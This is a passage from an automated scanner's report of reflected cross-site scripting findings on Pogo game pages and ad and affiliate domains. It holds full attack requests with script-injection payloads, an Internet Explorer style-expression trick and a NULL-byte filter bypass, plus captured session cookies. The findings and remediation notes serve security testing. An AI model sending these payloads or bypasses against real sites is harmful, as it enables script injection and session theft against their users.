GET /games/risk?6d31f"><script>alert(1)</script>879217c7909=1 HTTP/1.1 Host: board-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the ifl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 345c3"%3balert(1)//496dcbce961 was submitted in the ifl parameter. This input was echoed as 345c3";alert(1)//496dcbce961 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2111603&PluID=0&w=500&h=350&ord=3732683&ucm=true&ifl=$$ads/eyeblaster/addineyev2.jsp$$345c3"%3balert(1)//496dcbce961&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3a8a/3/0/%2a/u%3B231345033%3B0-0%3B7%3B27597681%3B2361-500/350%3B40124842/40142629/1%3B%3B%7Eaopt%3D3/0/ff/0%3B%7Esscs%3D%3f$$ HTTP/1.1 Host: bs.serving-sys.com Proxy-Connection: keep-alive Referer: http://game3.pogo.com/exhibit/loading/loading.jsp?pwid=760&phei=574&site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
3.466. http://card-games.pogo.com/games/rainy-day-spider-solitaire [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://card-games.pogo.com
Path: /games/rainy-day-spider-solitaire
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91aec"><script>alert(1)</script>ee1969806b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /games/rainy-day-spider-solitaire?91aec"><script>alert(1)</script>ee1969806b9=1 HTTP/1.1 Host: card-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the offerid request parameter is copied into the HTML document as plain text between tags. The payload b8b5e<script>alert(1)</script>ec2a9508206 was submitted in the offerid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /fs-bin/stat?id=FLenzF8lvbI&offerid=78941b8b5e<script>alert(1)</script>ec2a9508206&type=3&subid=0&tmpid=1826 HTTP/1.1 Host: click.linksynergy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 400 Bad Request Server: Apache-Coyote/1.1 Content-Length: 263 Date: Sun, 09 Jan 2011 02:07:11 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title>Error</title></head><body> Bad number format in offerid: For input string: "78941b8b5e<script>alert(1)</script>ec2a9508206" </body> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload %00cf310<a>f30753d02ee was submitted in the REST URL parameter 1. This input was echoed as cf310<a>f30753d02ee in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /weblog%00cf310<a>f30753d02ee/2006/06/again/ HTTP/1.1 Host: dean.edwards.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 09 Jan 2011 02:10:39 GMT Server: Apache/2.2.6 (Win32) PHP/5.2.5 X-Powered-By: PHP/5.2.5 Vary: Accept-Encoding Content-Length: 1644 Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00b5c8b"><script>alert(1)</script>133040de622 was submitted in the REST URL parameter 1. This input was echoed as b5c8b"><script>alert(1)</script>133040de622 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /weblog%00b5c8b"><script>alert(1)</script>133040de622/2006/06/again/ HTTP/1.1 Host: dean.edwards.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 09 Jan 2011 02:10:37 GMT Server: Apache/2.2.6 (Win32) PHP/5.2.5 X-Powered-By: PHP/5.2.5 Vary: Accept-Encoding Content-Length: 1790 Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 61c9d<a>82844ccdc7b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /weblog/2006/06/again61c9d<a>82844ccdc7b/ HTTP/1.1 Host: dean.edwards.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 09 Jan 2011 02:11:27 GMT Server: Apache/2.2.6 (Win32) PHP/5.2.5 X-Powered-By: PHP/5.2.5 X-Pingback: http://dean.edwards.name/weblog/xmlrpc.php Expires: Sun, 09 Jan 2011 02:11:27 GMT Last-Modified: Sun, 09 Jan 2011 02:11:27 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1352 Connection: close Content-Type: text/html; charset=UTF-8
3.471. http://dean.edwards.name/weblog/2006/06/again/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://dean.edwards.name
Path: /weblog/2006/06/again/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff341"><script>alert(1)</script>a6f101894d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ff341\"><script>alert(1)</script>a6f101894d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /weblog/2006/06/again/?ff341"><script>alert(1)</script>a6f101894d=1 HTTP/1.1 Host: dean.edwards.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the refid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 19ef4"%3balert(1)//ceec74c2135 was submitted in the refid parameter. This input was echoed as 19ef4";alert(1)//ceec74c2135 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /?site=pogo&refid=19ef4"%3balert(1)//ceec74c2135&ifw=756&pageSection=header_downloads&ifh=210&lkey=x HTTP/1.1 Host: download-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536510550-New%7C1297128510550%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; 117734103=Sat%20Jan%2008%202011%2019%3A28%3A34%20GMT%2D0600%20(Central%20Standard%20Time); OberonPogoComb=http%3A//download-games.pogo.com/%3Fsite%3Dpogo%26refid%3Dheadernav_fp_shopmenu%26ifw%3D756%26pageSection%3Dheader_downloads_store%26ifh%3D210%26lkey%3Dx; 11964850=Sat%20Jan%2008%202011%2019%3A28%3A45%20GMT%2D0600%20(Central%20Standard%20Time);
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Content-Type: text/html; charset=utf-8 Content-Length: 134282 Cache-Control: private, max-age=14348 Date: Sun, 09 Jan 2011 02:09:39 GMT Connection: close
<HTML> <HEAD> <meta name="msvalidate.01" content="F6F676EB374D905262C4FF19D14E715D" /> <meta name="description" content="Download games at Pogo including puzzle games, hidden object games, Pogo ...[SNIP]...
var s_pageName="HomePage" /* E-commerce Variables */ var s_state="" var s_zip="" var s_purchaseID="" var s_events="" var s_products=";" var s_eVar1="" var s_eVar2="" var s_eVar6="19ef4";alert(1)//ceec74c2135"; var s_eVar7="Home Page"; var s_eVar10="oberonpogostd"; var s_Prop10="oberonpogostd";
/* You may add or alter any code config here. */ var s_server="103"; var s_ ...[SNIP]...
The value of the refid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4a51"%3balert(1)//b1d0df0e2a0 was submitted in the refid parameter. This input was echoed as f4a51";alert(1)//b1d0df0e2a0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?site=pogo&refid=headernav_fp_shopmenuf4a51"%3balert(1)//b1d0df0e2a0&ifw=756&pageSection=header_downloads_store&ifh=210&lkey=x HTTP/1.1 Host: download-games.pogo.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/account/my-account/main.do Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536510550-New%7C1297128510550%3B
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Content-Type: text/html; charset=utf-8 Content-Length: 138764 Cache-Control: private, max-age=14372 Date: Sun, 09 Jan 2011 02:09:06 GMT Connection: close
<HTML> <HEAD> <meta name="msvalidate.01" content="F6F676EB374D905262C4FF19D14E715D" /> <meta name="description" content="Download games at Pogo including puzzle games, hidden object games, Pogo ...[SNIP]... omePage" /* E-commerce Variables */ var s_state="" var s_zip="" var s_purchaseID="" var s_events="" var s_products=";" var s_eVar1="" var s_eVar2="" var s_eVar6="headernav_fp_shopmenuf4a51";alert(1)//b1d0df0e2a0"; var s_eVar7="Home Page"; var s_eVar10="oberonpogostd"; var s_Prop10="oberonpogostd";
/* You may add or alter any code config here. */ var s_server="103"; var s_ ...[SNIP]...
The value of the refid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00b7aed"%20a%3db%20afd5e41295f was submitted in the refid parameter. This input was echoed as b7aed" a=b afd5e41295f in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /?site=pogo&refid=%00b7aed"%20a%3db%20afd5e41295f&ifw=756&pageSection=header_downloads&ifh=210&lkey=x HTTP/1.1 Host: download-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536510550-New%7C1297128510550%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; 117734103=Sat%20Jan%2008%202011%2019%3A28%3A34%20GMT%2D0600%20(Central%20Standard%20Time); OberonPogoComb=http%3A//download-games.pogo.com/%3Fsite%3Dpogo%26refid%3Dheadernav_fp_shopmenu%26ifw%3D756%26pageSection%3Dheader_downloads_store%26ifh%3D210%26lkey%3Dx; 11964850=Sat%20Jan%2008%202011%2019%3A28%3A45%20GMT%2D0600%20(Central%20Standard%20Time);
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Content-Type: text/html; charset=utf-8 Content-Length: 133128 Cache-Control: private, max-age=14395 Date: Sun, 09 Jan 2011 02:09:02 GMT Connection: close
The value of the refid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4970"style%3d"x%3aexpr/**/ession(alert(1))"b60ab2ea664 was submitted in the refid parameter. This input was echoed as c4970"style="x:expr/**/ession(alert(1))"b60ab2ea664 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /?site=pogo&refid=headernav_fp_shopmenuc4970"style%3d"x%3aexpr/**/ession(alert(1))"b60ab2ea664&ifw=756&pageSection=header_downloads_store&ifh=210&lkey=x HTTP/1.1 Host: download-games.pogo.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/account/my-account/main.do Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536510550-New%7C1297128510550%3B
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Content-Type: text/html; charset=utf-8 Content-Length: 144112 Cache-Control: private, max-age=14343 Date: Sun, 09 Jan 2011 02:08:53 GMT Connection: close
<HTML> <HEAD> <meta name="msvalidate.01" content="F6F676EB374D905262C4FF19D14E715D" /> <meta name="description" content="Download games at Pogo including puzzle games, hidden object games, Pogo ...[SNIP]... <tr style="cursor:hand;" onclick="window.location.href='/Category.aspx?code=110051313&genre=Pogo Originals&RefID=headernav_fp_shopmenuc4970"style="x:expr/**/ession(alert(1))"b60ab2ea664&Session=&orign=p_leftbar_catName&ln=en&=0'" height="25" Id="Cat_110051313" onmouseover="TurnOn(this.id,'on');" onmouseout="TurnOn(this.id,'off');" > ...[SNIP]...
The value of the SortBy request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 125db"style%3d"x%3aexpr/**/ession(alert(1))"7c938b75106 was submitted in the SortBy parameter. This input was echoed as 125db"style="x:expr/**/ession(alert(1))"7c938b75106 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /AllGames.aspx?SortBy=gameName125db"style%3d"x%3aexpr/**/ession(alert(1))"7c938b75106&sDir=ASC&Page=1 HTTP/1.1 Host: download-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536510550-New%7C1297128510550%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; 117734103=Sat%20Jan%2008%202011%2019%3A28%3A34%20GMT%2D0600%20(Central%20Standard%20Time); OberonPogoComb=http%3A//download-games.pogo.com/%3Fsite%3Dpogo%26refid%3Dheadernav_fp_shopmenu%26ifw%3D756%26pageSection%3Dheader_downloads_store%26ifh%3D210%26lkey%3Dx; 11964850=Sat%20Jan%2008%202011%2019%3A28%3A45%20GMT%2D0600%20(Central%20Standard%20Time);
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Content-Type: text/html; charset=utf-8 Content-Length: 62015 Cache-Control: private, max-age=14400 Date: Sun, 09 Jan 2011 02:10:12 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <HEAD> <meta name="description" content="Try all downloadable games at Pogo for free including Picktureka! Museum Mayhem, ...[SNIP]... <a href="/AllGames.aspx?SortBy=gameName125db"style="x:expr/**/ession(alert(1))"7c938b75106&sDir=ASC&Page=0" id="_ctl0_AllGamesUC1_oPagingBarUC_lnkPrev" class="txt11bg" style="text-decoration: underline"> ...[SNIP]...
The value of the sDir request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28368"style%3d"x%3aexpr/**/ession(alert(1))"1b59e9936ad was submitted in the sDir parameter. This input was echoed as 28368"style="x:expr/**/ession(alert(1))"1b59e9936ad in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /AllGames.aspx?SortBy=gameName&sDir=ASC28368"style%3d"x%3aexpr/**/ession(alert(1))"1b59e9936ad&Page=1 HTTP/1.1 Host: download-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536510550-New%7C1297128510550%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; 117734103=Sat%20Jan%2008%202011%2019%3A28%3A34%20GMT%2D0600%20(Central%20Standard%20Time); OberonPogoComb=http%3A//download-games.pogo.com/%3Fsite%3Dpogo%26refid%3Dheadernav_fp_shopmenu%26ifw%3D756%26pageSection%3Dheader_downloads_store%26ifh%3D210%26lkey%3Dx; 11964850=Sat%20Jan%2008%202011%2019%3A28%3A45%20GMT%2D0600%20(Central%20Standard%20Time);
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Content-Type: text/html; charset=utf-8 Content-Length: 62760 Cache-Control: private, max-age=14341 Date: Sun, 09 Jan 2011 02:10:46 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <HEAD> <meta name="description" content="Try all downloadable games at Pogo for free including Picktureka! Museum Mayhem, ...[SNIP]... <a href="/AllGames.aspx?SortBy=gameName&sDir=ASC28368"style="x:expr/**/ession(alert(1))"1b59e9936ad&Page=0" id="_ctl0_AllGamesUC1_oPagingBarUC_lnkPrev" class="txt11bg" style="text-decoration: underline"> ...[SNIP]...
The value of the RefID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62ffb"style%3d"x%3aexpr/**/ession(alert(1))"6ae1f7f4fc6 was submitted in the RefID parameter. This input was echoed as 62ffb"style="x:expr/**/ession(alert(1))"6ae1f7f4fc6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Category.aspx?code=1002&genre=New&RefID=62ffb"style%3d"x%3aexpr/**/ession(alert(1))"6ae1f7f4fc6&Session=&orign=p_leftbar_catName&ln=en&=0 HTTP/1.1 Host: download-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536510550-New%7C1297128510550%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; 117734103=Sat%20Jan%2008%202011%2019%3A28%3A34%20GMT%2D0600%20(Central%20Standard%20Time); OberonPogoComb=http%3A//download-games.pogo.com/%3Fsite%3Dpogo%26refid%3Dheadernav_fp_shopmenu%26ifw%3D756%26pageSection%3Dheader_downloads_store%26ifh%3D210%26lkey%3Dx; 11964850=Sat%20Jan%2008%202011%2019%3A28%3A45%20GMT%2D0600%20(Central%20Standard%20Time);
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Content-Type: text/html; charset=utf-8 Content-Length: 63438 Cache-Control: private, max-age=14380 Date: Sun, 09 Jan 2011 02:10:11 GMT Connection: close
<meta name="description" content="Download new games at Pogo including Plants vs. Zombies, Mystic Empor ...[SNIP]... <tr style="cursor:hand;" onclick="window.location.href='/Category.aspx?code=110051313&genre=Pogo Originals&RefID=62ffb"style="x:expr/**/ession(alert(1))"6ae1f7f4fc6&Session=&orign=p_leftbar_catName&ln=en&=0'" height="25" Id="Cat_110051313" onmouseover="TurnOn(this.id,'on');" onmouseout="TurnOn(this.id,'off');" > ...[SNIP]...
The value of the RefID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b0a9c"%3balert(1)//14e5022abab was submitted in the RefID parameter. This input was echoed as b0a9c";alert(1)//14e5022abab in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Category.aspx?code=1002&genre=New&RefID=b0a9c"%3balert(1)//14e5022abab&Session=&orign=p_leftbar_catName&ln=en&=0 HTTP/1.1 Host: download-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536510550-New%7C1297128510550%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; 117734103=Sat%20Jan%2008%202011%2019%3A28%3A34%20GMT%2D0600%20(Central%20Standard%20Time); OberonPogoComb=http%3A//download-games.pogo.com/%3Fsite%3Dpogo%26refid%3Dheadernav_fp_shopmenu%26ifw%3D756%26pageSection%3Dheader_downloads_store%26ifh%3D210%26lkey%3Dx; 11964850=Sat%20Jan%2008%202011%2019%3A28%3A45%20GMT%2D0600%20(Central%20Standard%20Time);
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Content-Type: text/html; charset=utf-8 Content-Length: 60850 Cache-Control: private, max-age=14344 Date: Sun, 09 Jan 2011 02:10:22 GMT Connection: close
<meta name="description" content="Download new games at Pogo including Plants vs. Zombies, Mystic Empor ...[SNIP]... ategory - [newGames]" /* E-commerce Variables */ var s_state="" var s_zip="" var s_purchaseID="" var s_events="" var s_products="newGames;" var s_eVar1="" var s_eVar2="" var s_eVar6="b0a9c";alert(1)//14e5022abab"; var s_eVar7="Category Page"; var s_eVar10="oberonpogostd"; var s_Prop10="oberonpogostd";
/* You may add or alter any code config here. */ var s_server="121"; va ...[SNIP]...
The value of the refId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 411ba"%3balert(1)//c28d43abb37 was submitted in the refId parameter. This input was echoed as 411ba";alert(1)//c28d43abb37 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Category.aspx?code=1000&refId=Hot_Sellers411ba"%3balert(1)//c28d43abb37 HTTP/1.1 Host: download-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536510550-New%7C1297128510550%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; 117734103=Sat%20Jan%2008%202011%2019%3A28%3A34%20GMT%2D0600%20(Central%20Standard%20Time); OberonPogoComb=http%3A//download-games.pogo.com/%3Fsite%3Dpogo%26refid%3Dheadernav_fp_shopmenu%26ifw%3D756%26pageSection%3Dheader_downloads_store%26ifh%3D210%26lkey%3Dx; 11964850=Sat%20Jan%2008%202011%2019%3A28%3A45%20GMT%2D0600%20(Central%20Standard%20Time);
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Content-Type: text/html; charset=utf-8 Content-Length: 61368 Cache-Control: private, max-age=14400 Date: Sun, 09 Jan 2011 02:10:14 GMT Connection: close
...[SNIP]... p_games]" /* E-commerce Variables */ var s_state="" var s_zip="" var s_purchaseID="" var s_events="" var s_products="top_games;" var s_eVar1="" var s_eVar2="" var s_eVar6="Hot_Sellers411ba";alert(1)//c28d43abb37"; var s_eVar7="Category Page"; var s_eVar10="oberonpogostd"; var s_Prop10="oberonpogostd";
/* You may add or alter any code config here. */ var s_server="102"; va ...[SNIP]...
The value of the refId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 818ae"style%3d"x%3aexpr/**/ession(alert(1))"026389c2ee8 was submitted in the refId parameter. This input was echoed as 818ae"style="x:expr/**/ession(alert(1))"026389c2ee8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
